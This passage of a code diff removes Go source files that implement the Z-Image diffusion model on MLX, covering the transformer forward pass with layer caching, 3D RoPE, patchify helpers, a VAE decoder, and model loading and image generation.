CapSin: capSin,
UnifiedCos: unifiedCos,
UnifiedSin: unifiedSin,
ImgLen: imgLen,
CapLen: capLen,
}
}
// Forward runs the Z-Image transformer with precomputed RoPE
func (m *Transformer) Forward(x *mlx.Array, t *mlx.Array, capFeats *mlx.Array, rope *RoPECache) *mlx.Array {
imgLen := rope.ImgLen
// Timestep embedding -> [B, 256]
temb := m.TEmbed.Forward(mlx.MulScalar(t, m.TransformerConfig.TScale))
// Embed image patches -> [B, L_img, dim]
x = m.XEmbed.Forward(x)
// Embed caption features -> [B, L_cap, dim]
capEmb := m.CapEmbed.Forward(capFeats)
eps := m.NormEps
// Noise refiner: refine image patches with modulation
for _, refiner := range m.NoiseRefiners {
x = refiner.Forward(x, temb, rope.ImgCos, rope.ImgSin, eps)
}
// Context refiner: refine caption (no modulation)
for _, refiner := range m.ContextRefiners {
capEmb = refiner.Forward(capEmb, nil, rope.CapCos, rope.CapSin, eps)
}
// Concatenate image and caption for joint attention
unified := mlx.Concatenate([]*mlx.Array{x, capEmb}, 1)
// Main transformer layers use full unified RoPE
for _, layer := range m.Layers {
unified = layer.Forward(unified, temb, rope.UnifiedCos, rope.UnifiedSin, eps)
}
// Extract image tokens only
unifiedShape := unified.Shape()
B := unifiedShape[0]
imgOut := mlx.Slice(unified, []int32{0, 0, 0}, []int32{B, imgLen, unifiedShape[2]})
// Final layer
return m.FinalLayer.Forward(imgOut, temb)
}
// ForwardWithCache runs the transformer with layer caching for faster inference.
// On refresh steps (step % cacheInterval == 0), all layers are computed and cached.
// On other steps, shallow layers (0 to cacheLayers-1) reuse cached outputs.
func (m *Transformer) ForwardWithCache(
x *mlx.Array,
t *mlx.Array,
capFeats *mlx.Array,
rope *RoPECache,
stepCache *cache.StepCache,
step int,
cacheInterval int,
) *mlx.Array {
imgLen := rope.ImgLen
cacheLayers := stepCache.NumLayers()
eps := m.NormEps
// Timestep embedding -> [B, 256]
temb := m.TEmbed.Forward(mlx.MulScalar(t, m.TransformerConfig.TScale))
// Embed image patches -> [B, L_img, dim]
x = m.XEmbed.Forward(x)
// Context refiners: compute once on step 0, reuse forever
// (caption embedding doesn't depend on timestep or latents)
var capEmb *mlx.Array
if stepCache.GetConstant() != nil {
capEmb = stepCache.GetConstant()
} else {
capEmb = m.CapEmbed.Forward(capFeats)
for _, refiner := range m.ContextRefiners {
capEmb = refiner.Forward(capEmb, nil, rope.CapCos, rope.CapSin, eps)
}
stepCache.SetConstant(capEmb)
}
// Noise refiners: always compute (depend on x which changes each step)
for _, refiner := range m.NoiseRefiners {
x = refiner.Forward(x, temb, rope.ImgCos, rope.ImgSin, eps)
}
// Concatenate image and caption for joint attention
unified := mlx.Concatenate([]*mlx.Array{x, capEmb}, 1)
// Determine if this is a cache refresh step
refreshCache := stepCache.ShouldRefresh(step, cacheInterval)
// Main transformer layers with caching
for i, layer := range m.Layers {
if i < cacheLayers && !refreshCache && stepCache.Get(i) != nil {
// Use cached output for shallow layers
unified = stepCache.Get(i)
} else {
// Compute layer
unified = layer.Forward(unified, temb, rope.UnifiedCos, rope.UnifiedSin, eps)
// Cache shallow layer outputs on refresh steps
if i < cacheLayers && refreshCache {
stepCache.Set(i, unified)
}
}
}
// Extract image tokens only
unifiedShape := unified.Shape()
B := unifiedShape[0]
imgOut := mlx.Slice(unified, []int32{0, 0, 0}, []int32{B, imgLen, unifiedShape[2]})
// Final layer
return m.FinalLayer.Forward(imgOut, temb)
}
// createCoordinateGrid creates 3D position grid [1, d0*d1*d2, 3]
func createCoordinateGrid(d0, d1, d2, s0, s1, s2 int32) *mlx.Array {
// Create meshgrid and stack
total := d0 * d1 * d2
coords := make([]float32, total*3)
idx := 0
for i := int32(0); i < d0; i++ {
for j := int32(0); j < d1; j++ {
for k := int32(0); k < d2; k++ {
coords[idx*3+0] = float32(s0 + i)
coords[idx*3+1] = float32(s1 + j)
coords[idx*3+2] = float32(s2 + k)
idx++
}
}
}
return mlx.NewArray(coords, []int32{1, total, 3})
}
// prepareRoPE3D computes cos/sin for 3-axis RoPE
// positions: [B, L, 3] with (h, w, t) coordinates
// axesDims: [32, 48, 48] - dimensions for each axis
// Returns: cos, sin each [B, L, 1, head_dim/2]
func prepareRoPE3D(positions *mlx.Array, axesDims []int32) (*mlx.Array, *mlx.Array) {
// Compute frequencies for each axis
// dims = [32, 48, 48], so halves = [16, 24, 24]
ropeTheta := float32(256.0)
freqs := make([]*mlx.Array, 3)
for axis := 0; axis < 3; axis++ {
half := axesDims[axis] / 2
f := make([]float32, half)
for i := int32(0); i < half; i++ {
f[i] = float32(math.Exp(-math.Log(float64(ropeTheta)) * float64(i) / float64(half)))
}
freqs[axis] = mlx.NewArray(f, []int32{1, 1, 1, half})
}
// Extract position coordinates
shape := positions.Shape()
B := shape[0]
L := shape[1]
// positions[:, :, 0] -> h positions
posH := mlx.Slice(positions, []int32{0, 0, 0}, []int32{B, L, 1})
posW := mlx.Slice(positions, []int32{0, 0, 1}, []int32{B, L, 2})
posT := mlx.Slice(positions, []int32{0, 0, 2}, []int32{B, L, 3})
// Compute args: pos * freqs for each axis
posH = mlx.ExpandDims(posH, 3) // [B, L, 1, 1]
posW = mlx.ExpandDims(posW, 3)
posT = mlx.ExpandDims(posT, 3)
argsH := mlx.Mul(posH, freqs[0]) // [B, L, 1, 16]
argsW := mlx.Mul(posW, freqs[1]) // [B, L, 1, 24]
argsT := mlx.Mul(posT, freqs[2]) // [B, L, 1, 24]
// Concatenate: [B, L, 1, 16+24+24=64]
args := mlx.Concatenate([]*mlx.Array{argsH, argsW, argsT}, 3)
// Compute cos and sin
return mlx.Cos(args), mlx.Sin(args)
}
// PatchifyLatents converts latents [B, C, H, W] to patches [B, L, C*patch^2]
// Matches Python: x.reshape(C, 1, 1, H_tok, 2, W_tok, 2).transpose(1,2,3,5,4,6,0).reshape(1,-1,C*4)
func PatchifyLatents(latents *mlx.Array, patchSize int32) *mlx.Array {
shape := latents.Shape()
C := shape[1]
H := shape[2]
W := shape[3]
pH := H / patchSize // H_tok
pW := W / patchSize // W_tok
// Match Python exactly: reshape treating B=1 as part of contiguous data
// [1, C, H, W] -> [C, 1, 1, pH, 2, pW, 2]
x := mlx.Reshape(latents, C, 1, 1, pH, patchSize, pW, patchSize)
// Python: transpose(1, 2, 3, 5, 4, 6, 0)
// [C, 1, 1, pH, 2, pW, 2] -> [1, 1, pH, pW, 2, 2, C]
x = mlx.Transpose(x, 1, 2, 3, 5, 4, 6, 0)
// [1, 1, pH, pW, 2, 2, C] -> [1, pH*pW, C*4]
return mlx.Reshape(x, 1, pH*pW, C*patchSize*patchSize)
}
// UnpatchifyLatents converts patches [B, L, C*patch^2] back to [B, C, H, W]
// Matches Python: out.reshape(1,1,H_tok,W_tok,2,2,C).transpose(6,0,1,2,4,3,5).reshape(1,C,H,W)
func UnpatchifyLatents(patches *mlx.Array, patchSize, H, W, C int32) *mlx.Array {
pH := H / patchSize
pW := W / patchSize
// [1, L, C*4] -> [1, 1, pH, pW, 2, 2, C]
x := mlx.Reshape(patches, 1, 1, pH, pW, patchSize, patchSize, C)
// Python: transpose(6, 0, 1, 2, 4, 3, 5)
// [1, 1, pH, pW, 2, 2, C] -> [C, 1, 1, pH, 2, pW, 2]
x = mlx.Transpose(x, 6, 0, 1, 2, 4, 3, 5)
// [C, 1, 1, pH, 2, pW, 2] -> [1, C, H, W]
return mlx.Reshape(x, 1, C, H, W)
}

View File

@@ -1,652 +0,0 @@
//go:build mlx
package zimage
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// VAEConfig holds VAE decoder configuration
type VAEConfig struct {
InChannels int32 `json:"in_channels"`
OutChannels int32 `json:"out_channels"`
LatentChannels int32 `json:"latent_channels"`
BlockOutChannels []int32 `json:"block_out_channels"`
LayersPerBlock int32 `json:"layers_per_block"`
NormNumGroups int32 `json:"norm_num_groups"`
ScalingFactor float32 `json:"scaling_factor"`
ShiftFactor float32 `json:"shift_factor"`
}
// loadVAEConfig loads VAE config from a JSON file
func loadVAEConfig(path string) (*VAEConfig, error) {
data, err := os.ReadFile(path)
if err != nil {
return nil, fmt.Errorf("read config: %w", err)
}
var cfg VAEConfig
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
return &cfg, nil
}
// GroupNormLayer implements group normalization
type GroupNormLayer struct {
Weight *mlx.Array
Bias *mlx.Array
NumGroups int32
Eps float32
}
// NewGroupNorm creates a group norm layer
func NewGroupNorm(weight, bias *mlx.Array, numGroups int32) *GroupNormLayer {
return &GroupNormLayer{
Weight: weight,
Bias: bias,
NumGroups: numGroups,
Eps: 1e-5,
}
}
// Forward applies group normalization
func (gn *GroupNormLayer) Forward(x *mlx.Array) *mlx.Array {
// x: [B, C, H, W]
shape := x.Shape()
B := shape[0]
C := shape[1]
H := shape[2]
W := shape[3]
// Reshape to [B, groups, C/groups, H, W]
groupSize := C / gn.NumGroups
x = mlx.Reshape(x, B, gn.NumGroups, groupSize, H, W)
// Compute mean and variance per group
mean := mlx.Mean(x, 2, true)
mean = mlx.Mean(mean, 3, true)
mean = mlx.Mean(mean, 4, true)
xCentered := mlx.Sub(x, mean)
variance := mlx.Mean(mlx.Square(xCentered), 2, true)
variance = mlx.Mean(variance, 3, true)
variance = mlx.Mean(variance, 4, true)
// Normalize
xNorm := mlx.Div(xCentered, mlx.Sqrt(mlx.AddScalar(variance, gn.Eps)))
// Reshape back to [B, C, H, W]
xNorm = mlx.Reshape(xNorm, B, C, H, W)
// Scale and shift (weight and bias are [C])
if gn.Weight != nil {
weight := mlx.Reshape(gn.Weight, 1, C, 1, 1)
xNorm = mlx.Mul(xNorm, weight)
}
if gn.Bias != nil {
bias := mlx.Reshape(gn.Bias, 1, C, 1, 1)
xNorm = mlx.Add(xNorm, bias)
}
return xNorm
}
// Conv2D represents a 2D convolution layer
// MLX uses NHWC format, but we store weights in OHWI format for MLX conv
type Conv2D struct {
Weight *mlx.Array // [out_channels, kH, kW, in_channels] (OHWI for MLX)
Bias *mlx.Array // [out_channels]
Stride int32
Padding int32
}
// NewConv2D creates a Conv2D layer
// weight comes in as [out_channels, in_channels, kH, kW] (OIHW from PyTorch)
// we transpose to [out_channels, kH, kW, in_channels] (OHWI for MLX)
func NewConv2D(weight, bias *mlx.Array, stride, padding int32) *Conv2D {
// Transpose weight from OIHW to OHWI
// [O, I, H, W] -> [O, H, W, I]
weightOHWI := mlx.Transpose(weight, 0, 2, 3, 1)
return &Conv2D{
Weight: weightOHWI,
Bias: bias,
Stride: stride,
Padding: padding,
}
}
// Forward applies convolution
// Input x is in NCHW format, we convert to NHWC for MLX, then back to NCHW
func (conv *Conv2D) Forward(x *mlx.Array) *mlx.Array {
// x: [N, C, H, W] -> [N, H, W, C]
xNHWC := mlx.Transpose(x, 0, 2, 3, 1)
// Conv in NHWC format
outNHWC := mlx.Conv2d(xNHWC, conv.Weight, conv.Stride, conv.Padding)
// Convert back to NCHW: [N, H, W, C] -> [N, C, H, W]
out := mlx.Transpose(outNHWC, 0, 3, 1, 2)
if conv.Bias != nil {
bias := mlx.Reshape(conv.Bias, 1, conv.Bias.Dim(0), 1, 1)
out = mlx.Add(out, bias)
}
return out
}
// ResnetBlock2D implements a ResNet block for VAE
type ResnetBlock2D struct {
Norm1 *GroupNormLayer
Conv1 *Conv2D
Norm2 *GroupNormLayer
Conv2 *Conv2D
ConvShortcut *Conv2D // nil if in_channels == out_channels
}
// NewResnetBlock2D creates a ResNet block
func NewResnetBlock2D(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*ResnetBlock2D, error) {
norm1Weight, err := weights.GetTensor(prefix + ".norm1.weight")
if err != nil {
return nil, err
}
norm1Bias, err := weights.GetTensor(prefix + ".norm1.bias")
if err != nil {
return nil, err
}
conv1Weight, err := weights.GetTensor(prefix + ".conv1.weight")
if err != nil {
return nil, err
}
conv1Bias, err := weights.GetTensor(prefix + ".conv1.bias")
if err != nil {
return nil, err
}
norm2Weight, err := weights.GetTensor(prefix + ".norm2.weight")
if err != nil {
return nil, err
}
norm2Bias, err := weights.GetTensor(prefix + ".norm2.bias")
if err != nil {
return nil, err
}
conv2Weight, err := weights.GetTensor(prefix + ".conv2.weight")
if err != nil {
return nil, err
}
conv2Bias, err := weights.GetTensor(prefix + ".conv2.bias")
if err != nil {
return nil, err
}
block := &ResnetBlock2D{
Norm1: NewGroupNorm(norm1Weight, norm1Bias, numGroups),
Conv1: NewConv2D(conv1Weight, conv1Bias, 1, 1),
Norm2: NewGroupNorm(norm2Weight, norm2Bias, numGroups),
Conv2: NewConv2D(conv2Weight, conv2Bias, 1, 1),
}
if weights.HasTensor(prefix + ".conv_shortcut.weight") {
shortcutWeight, err := weights.GetTensor(prefix + ".conv_shortcut.weight")
if err != nil {
return nil, err
}
shortcutBias, err := weights.GetTensor(prefix + ".conv_shortcut.bias")
if err != nil {
return nil, err
}
block.ConvShortcut = NewConv2D(shortcutWeight, shortcutBias, 1, 0)
}
return block, nil
}
// Forward applies the ResNet block with staged evaluation
func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
var h *mlx.Array
// Stage 1: norm1
{
h = rb.Norm1.Forward(x)
mlx.Eval(h)
}
// Stage 2: silu + conv1
{
prev := h
h = mlx.SiLU(h)
h = rb.Conv1.Forward(h)
prev.Free()
mlx.Eval(h)
}
// Stage 3: norm2
{
prev := h
h = rb.Norm2.Forward(h)
prev.Free()
mlx.Eval(h)
}
// Stage 4: silu + conv2
{
prev := h
h = mlx.SiLU(h)
h = rb.Conv2.Forward(h)
prev.Free()
mlx.Eval(h)
}
// Residual connection
{
prev := h
if rb.ConvShortcut != nil {
shortcut := rb.ConvShortcut.Forward(x)
h = mlx.Add(h, shortcut)
} else {
h = mlx.Add(h, x)
}
prev.Free()
mlx.Eval(h)
}
return h
}
// VAEAttentionBlock implements self-attention for VAE
type VAEAttentionBlock struct {
GroupNorm *GroupNormLayer
ToQWeight *mlx.Array
ToQBias *mlx.Array
ToKWeight *mlx.Array
ToKBias *mlx.Array
ToVWeight *mlx.Array
ToVBias *mlx.Array
ToOutWeight *mlx.Array
ToOutBias *mlx.Array
NumHeads int32
}
// NewVAEAttentionBlock creates an attention block
func NewVAEAttentionBlock(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*VAEAttentionBlock, error) {
normWeight, err := weights.GetTensor(prefix + ".group_norm.weight")
if err != nil {
return nil, err
}
normBias, err := weights.GetTensor(prefix + ".group_norm.bias")
if err != nil {
return nil, err
}
toQWeight, err := weights.GetTensor(prefix + ".to_q.weight")
if err != nil {
return nil, err
}
toQBias, err := weights.GetTensor(prefix + ".to_q.bias")
if err != nil {
return nil, err
}
toKWeight, err := weights.GetTensor(prefix + ".to_k.weight")
if err != nil {
return nil, err
}
toKBias, err := weights.GetTensor(prefix + ".to_k.bias")
if err != nil {
return nil, err
}
toVWeight, err := weights.GetTensor(prefix + ".to_v.weight")
if err != nil {
return nil, err
}
toVBias, err := weights.GetTensor(prefix + ".to_v.bias")
if err != nil {
return nil, err
}
toOutWeight, err := weights.GetTensor(prefix + ".to_out.0.weight")
if err != nil {
return nil, err
}
toOutBias, err := weights.GetTensor(prefix + ".to_out.0.bias")
if err != nil {
return nil, err
}
return &VAEAttentionBlock{
GroupNorm: NewGroupNorm(normWeight, normBias, numGroups),
ToQWeight: mlx.Transpose(toQWeight, 1, 0),
ToQBias: toQBias,
ToKWeight: mlx.Transpose(toKWeight, 1, 0),
ToKBias: toKBias,
ToVWeight: mlx.Transpose(toVWeight, 1, 0),
ToVBias: toVBias,
ToOutWeight: mlx.Transpose(toOutWeight, 1, 0),
ToOutBias: toOutBias,
NumHeads: 1,
}, nil
}
// Forward applies attention with staged evaluation
func (ab *VAEAttentionBlock) Forward(x *mlx.Array) *mlx.Array {
residual := x
shape := x.Shape()
B := shape[0]
C := shape[1]
H := shape[2]
W := shape[3]
var h *mlx.Array
// Stage 1: GroupNorm + reshape
{
h = ab.GroupNorm.Forward(x)
h = mlx.Transpose(h, 0, 2, 3, 1)
h = mlx.Reshape(h, B, H*W, C)
mlx.Eval(h)
}
var out *mlx.Array
// Stage 2: Q, K, V projections + attention
{
q := mlx.Linear(h, ab.ToQWeight)
q = mlx.Add(q, ab.ToQBias)
k := mlx.Linear(h, ab.ToKWeight)
k = mlx.Add(k, ab.ToKBias)
v := mlx.Linear(h, ab.ToVWeight)
v = mlx.Add(v, ab.ToVBias)
h.Free()
q = mlx.ExpandDims(q, 1)
k = mlx.ExpandDims(k, 1)
v = mlx.ExpandDims(v, 1)
scale := float32(1.0 / math.Sqrt(float64(C)))
out = mlx.ScaledDotProductAttention(q, k, v, scale, false)
out = mlx.Squeeze(out, 1)
mlx.Eval(out)
}
// Stage 3: Output projection + reshape + residual
{
prev := out
out = mlx.Linear(out, ab.ToOutWeight)
out = mlx.Add(out, ab.ToOutBias)
out = mlx.Reshape(out, B, H, W, C)
out = mlx.Transpose(out, 0, 3, 1, 2)
out = mlx.Add(out, residual)
prev.Free()
mlx.Eval(out)
}
return out
}
// UpDecoderBlock2D implements an upsampling decoder block
type UpDecoderBlock2D struct {
ResnetBlocks []*ResnetBlock2D
Upsample *Conv2D
}
// NewUpDecoderBlock2D creates an up decoder block
func NewUpDecoderBlock2D(weights *safetensors.ModelWeights, prefix string, numLayers, numGroups int32, hasUpsample bool) (*UpDecoderBlock2D, error) {
resnets := make([]*ResnetBlock2D, numLayers)
for i := int32(0); i < numLayers; i++ {
resPrefix := fmt.Sprintf("%s.resnets.%d", prefix, i)
resnet, err := NewResnetBlock2D(weights, resPrefix, numGroups)
if err != nil {
return nil, err
}
resnets[i] = resnet
}
var upsample *Conv2D
if hasUpsample {
upWeight, err := weights.GetTensor(prefix + ".upsamplers.0.conv.weight")
if err != nil {
return nil, err
}
upBias, err := weights.GetTensor(prefix + ".upsamplers.0.conv.bias")
if err != nil {
return nil, err
}
upsample = NewConv2D(upWeight, upBias, 1, 1)
}
return &UpDecoderBlock2D{
ResnetBlocks: resnets,
Upsample: upsample,
}, nil
}
// Forward applies the up decoder block with staged evaluation to reduce peak memory
func (ub *UpDecoderBlock2D) Forward(x *mlx.Array) *mlx.Array {
for _, resnet := range ub.ResnetBlocks {
prev := x
x = resnet.Forward(x) // ResNet handles its own pools
prev.Free()
}
if ub.Upsample != nil {
// Stage 1: Upsample2x (nearest neighbor)
{
prev := x
x = Upsample2x(x)
prev.Free()
mlx.Eval(x)
}
// Stage 2: Upsample conv
{
prev := x
x = ub.Upsample.Forward(x)
prev.Free()
mlx.Eval(x)
}
}
return x
}
// VAEMidBlock is the middle block with attention
type VAEMidBlock struct {
Resnet1 *ResnetBlock2D
Attention *VAEAttentionBlock
Resnet2 *ResnetBlock2D
}
// NewVAEMidBlock creates the mid block
func NewVAEMidBlock(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*VAEMidBlock, error) {
resnet1, err := NewResnetBlock2D(weights, prefix+".resnets.0", numGroups)
if err != nil {
return nil, err
}
attention, err := NewVAEAttentionBlock(weights, prefix+".attentions.0", numGroups)
if err != nil {
return nil, err
}
resnet2, err := NewResnetBlock2D(weights, prefix+".resnets.1", numGroups)
if err != nil {
return nil, err
}
return &VAEMidBlock{
Resnet1: resnet1,
Attention: attention,
Resnet2: resnet2,
}, nil
}
// Forward applies the mid block with staged evaluation
func (mb *VAEMidBlock) Forward(x *mlx.Array) *mlx.Array {
prev := x
x = mb.Resnet1.Forward(x) // ResNet handles its own pools
prev.Free()
// Attention handles its own pools
prev = x
x = mb.Attention.Forward(x)
prev.Free()
prev = x
x = mb.Resnet2.Forward(x) // ResNet handles its own pools
prev.Free()
return x
}
// VAEDecoder is the full VAE decoder
type VAEDecoder struct {
Config *VAEConfig
ConvIn *Conv2D
MidBlock *VAEMidBlock
UpBlocks []*UpDecoderBlock2D
ConvNormOut *GroupNormLayer
ConvOut *Conv2D
}
// Load loads the VAE decoder from a directory
func (m *VAEDecoder) Load(path string) error {
fmt.Println("Loading VAE decoder...")
// Load config
cfg, err := loadVAEConfig(filepath.Join(path, "config.json"))
if err != nil {
return fmt.Errorf("config: %w", err)
}
m.Config = cfg
// Load weights
weights, err := safetensors.LoadModelWeights(path)
if err != nil {
return fmt.Errorf("weights: %w", err)
}
// Load conv_in
fmt.Print(" Loading conv_in... ")
convInWeight, err := weights.GetTensor("decoder.conv_in.weight")
if err != nil {
return err
}
convInBias, err := weights.GetTensor("decoder.conv_in.bias")
if err != nil {
return err
}
m.ConvIn = NewConv2D(convInWeight, convInBias, 1, 1)
fmt.Println("✓")
// Load mid block
fmt.Print(" Loading mid block... ")
m.MidBlock, err = NewVAEMidBlock(weights, "decoder.mid_block", cfg.NormNumGroups)
if err != nil {
return err
}
fmt.Println("✓")
// Load up blocks
fmt.Print(" Loading up blocks... ")
numBlocks := len(cfg.BlockOutChannels)
m.UpBlocks = make([]*UpDecoderBlock2D, numBlocks)
for i := 0; i < numBlocks; i++ {
prefix := fmt.Sprintf("decoder.up_blocks.%d", i)
hasUpsample := i < numBlocks-1
m.UpBlocks[i], err = NewUpDecoderBlock2D(weights, prefix, cfg.LayersPerBlock+1, cfg.NormNumGroups, hasUpsample)
if err != nil {
return err
}
}
fmt.Printf("✓ [%d blocks]\n", numBlocks)
// Load conv_norm_out
fmt.Print(" Loading conv_norm_out... ")
normWeight, err := weights.GetTensor("decoder.conv_norm_out.weight")
if err != nil {
return err
}
normBias, err := weights.GetTensor("decoder.conv_norm_out.bias")
if err != nil {
return err
}
m.ConvNormOut = NewGroupNorm(normWeight, normBias, cfg.NormNumGroups)
fmt.Println("✓")
// Load conv_out
fmt.Print(" Loading conv_out... ")
convOutWeight, err := weights.GetTensor("decoder.conv_out.weight")
if err != nil {
return err
}
convOutBias, err := weights.GetTensor("decoder.conv_out.bias")
if err != nil {
return err
}
m.ConvOut = NewConv2D(convOutWeight, convOutBias, 1, 1)
fmt.Println("✓")
weights.ReleaseAll()
return nil
}
// Decode decodes latents to images.
// Uses staged pools to free intermediate arrays and reduce peak memory.
func (vae *VAEDecoder) Decode(latents *mlx.Array) *mlx.Array {
var h *mlx.Array
{
z := mlx.DivScalar(latents, vae.Config.ScalingFactor)
z = mlx.AddScalar(z, vae.Config.ShiftFactor)
h = vae.ConvIn.Forward(z)
mlx.Eval(h)
}
h = vae.MidBlock.Forward(h)
for _, upBlock := range vae.UpBlocks {
h = upBlock.Forward(h)
}
{
prev := h
h = vae.ConvNormOut.Forward(h)
h = mlx.SiLU(h)
h = vae.ConvOut.Forward(h)
// VAE outputs [-1, 1], convert to [0, 1]
h = mlx.AddScalar(mlx.MulScalar(h, 0.5), 0.5)
h = mlx.ClipScalar(h, 0.0, 1.0, true, true)
prev.Free()
mlx.Eval(h)
}
return h
}
// Upsample2x performs 2x nearest neighbor upsampling using broadcast.
// x: [B, C, H, W] -> [B, C, H*2, W*2]
func Upsample2x(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
C := shape[1]
H := shape[2]
W := shape[3]
// [B, C, H, W] -> [B, C, H, 1, W, 1]
x = mlx.Reshape(x, B, C, H, 1, W, 1)
// Broadcast to [B, C, H, 2, W, 2]
x = mlx.BroadcastTo(x, []int32{B, C, H, 2, W, 2})
// Reshape to [B, C, H*2, W*2]
x = mlx.Reshape(x, B, C, H*2, W*2)
return x
}

View File

@@ -1,363 +0,0 @@
//go:build mlx
// Package zimage implements the Z-Image diffusion transformer model.
package zimage
import (
"context"
"fmt"
"path/filepath"
"time"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/tokenizer"
)
// GenerateConfig holds all options for image generation.
type GenerateConfig struct {
Prompt string
NegativePrompt string // Empty = no CFG
CFGScale float32 // Only used if NegativePrompt is set (default: 4.0)
Width int32 // Image width (default: 1024)
Height int32 // Image height (default: 1024)
Steps int // Denoising steps (default: 9 for turbo)
Seed int64 // Random seed
Progress ProgressFunc // Optional progress callback
CapturePath string // GPU capture path (debug)
// Layer caching options (speedup via shallow layer reuse)
LayerCache bool // Enable layer caching (default: false)
CacheInterval int // Refresh cache every N steps (default: 3)
CacheLayers int // Number of shallow layers to cache (default: 15)
}
// ProgressFunc is called during generation with step progress.
type ProgressFunc func(step, totalSteps int)
// Model represents a Z-Image diffusion model.
type Model struct {
ModelPath string
Tokenizer *tokenizer.Tokenizer
TextEncoder *Qwen3TextEncoder
Transformer *Transformer
VAEDecoder *VAEDecoder
}
// Load loads the Z-Image model from a directory.
func (m *Model) Load(modelPath string) error {
fmt.Println("Loading Z-Image model...")
start := time.Now()
if mlx.GPUIsAvailable() {
mlx.SetDefaultDeviceGPU()
mlx.EnableCompile()
}
m.ModelPath = modelPath
// Load tokenizer
fmt.Print(" Loading tokenizer... ")
tokenizerPath := filepath.Join(modelPath, "tokenizer", "tokenizer.json")
tok, err := tokenizer.Load(tokenizerPath)
if err != nil {
return fmt.Errorf("tokenizer: %w", err)
}
m.Tokenizer = tok
fmt.Println("✓")
// Load text encoder
m.TextEncoder = &Qwen3TextEncoder{}
if err := m.TextEncoder.Load(filepath.Join(modelPath, "text_encoder")); err != nil {
return fmt.Errorf("text encoder: %w", err)
}
mlx.Eval(mlx.Collect(m.TextEncoder)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
// Load transformer
m.Transformer = &Transformer{}
if err := m.Transformer.Load(filepath.Join(modelPath, "transformer")); err != nil {
return fmt.Errorf("transformer: %w", err)
}
mlx.Eval(mlx.Collect(m.Transformer)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
// Load VAE decoder
m.VAEDecoder = &VAEDecoder{}
if err := m.VAEDecoder.Load(filepath.Join(modelPath, "vae")); err != nil {
return fmt.Errorf("VAE decoder: %w", err)
}
mlx.Eval(mlx.Collect(m.VAEDecoder)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
mem := mlx.MetalGetActiveMemory()
fmt.Printf(" Loaded in %.2fs (%.1f GB VRAM)\n", time.Since(start).Seconds(), float64(mem)/(1024*1024*1024))
return nil
}
// Generate creates an image from a prompt.
func (m *Model) Generate(prompt string, width, height int32, steps int, seed int64) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
Prompt: prompt,
Width: width,
Height: height,
Steps: steps,
Seed: seed,
})
}
// GenerateWithProgress creates an image with progress callback.
func (m *Model) GenerateWithProgress(prompt string, width, height int32, steps int, seed int64, progress ProgressFunc) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
Prompt: prompt,
Width: width,
Height: height,
Steps: steps,
Seed: seed,
Progress: progress,
})
}
// GenerateWithCFG creates an image with classifier-free guidance.
func (m *Model) GenerateWithCFG(prompt, negativePrompt string, width, height int32, steps int, seed int64, cfgScale float32, progress ProgressFunc) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
Prompt: prompt,
NegativePrompt: negativePrompt,
CFGScale: cfgScale,
Width: width,
Height: height,
Steps: steps,
Seed: seed,
Progress: progress,
})
}
// GenerateFromConfig generates an image using the unified config struct.
func (m *Model) GenerateFromConfig(cfg *GenerateConfig) (*mlx.Array, error) {
start := time.Now()
result, err := m.generate(cfg)
if err != nil {
return nil, err
}
if cfg.NegativePrompt != "" {
fmt.Printf("Generated with CFG (scale=%.1f) in %.2fs (%d steps)\n", cfg.CFGScale, time.Since(start).Seconds(), cfg.Steps)
} else {
fmt.Printf("Generated in %.2fs (%d steps)\n", time.Since(start).Seconds(), cfg.Steps)
}
return result, nil
}
// GenerateImage implements model.ImageModel interface.
func (m *Model) GenerateImage(ctx context.Context, prompt string, width, height int32, steps int, seed int64) (*mlx.Array, error) {
return m.Generate(prompt, width, height, steps, seed)
}
// generate is the internal denoising pipeline.
func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
// Apply defaults
if cfg.Width <= 0 {
cfg.Width = 1024
}
if cfg.Height <= 0 {
cfg.Height = 1024
}
if cfg.Steps <= 0 {
cfg.Steps = 9 // Turbo default
}
if cfg.CFGScale <= 0 {
cfg.CFGScale = 4.0
}
if cfg.LayerCache {
if cfg.CacheInterval <= 0 {
cfg.CacheInterval = 3
}
if cfg.CacheLayers <= 0 {
cfg.CacheLayers = 15 // Half of 30 layers
}
}
useCFG := cfg.NegativePrompt != ""
tcfg := m.Transformer.TransformerConfig
latentH := cfg.Height / 8
latentW := cfg.Width / 8
hTok := latentH / tcfg.PatchSize
wTok := latentW / tcfg.PatchSize
// Text encoding with padding to multiple of 32
var posEmb, negEmb *mlx.Array
{
posEmb, _ = m.TextEncoder.EncodePrompt(m.Tokenizer, cfg.Prompt, 512)
if useCFG {
negEmb, _ = m.TextEncoder.EncodePrompt(m.Tokenizer, cfg.NegativePrompt, 512)
}
// Pad both to same length (multiple of 32)
maxLen := posEmb.Shape()[1]
if useCFG && negEmb.Shape()[1] > maxLen {
maxLen = negEmb.Shape()[1]
}
if pad := (32 - (maxLen % 32)) % 32; pad > 0 {
maxLen += pad
}
posEmb = padToLength(posEmb, maxLen)
if useCFG {
negEmb = padToLength(negEmb, maxLen)
mlx.Keep(posEmb, negEmb)
mlx.Eval(posEmb, negEmb)
} else {
mlx.Keep(posEmb)
mlx.Eval(posEmb)
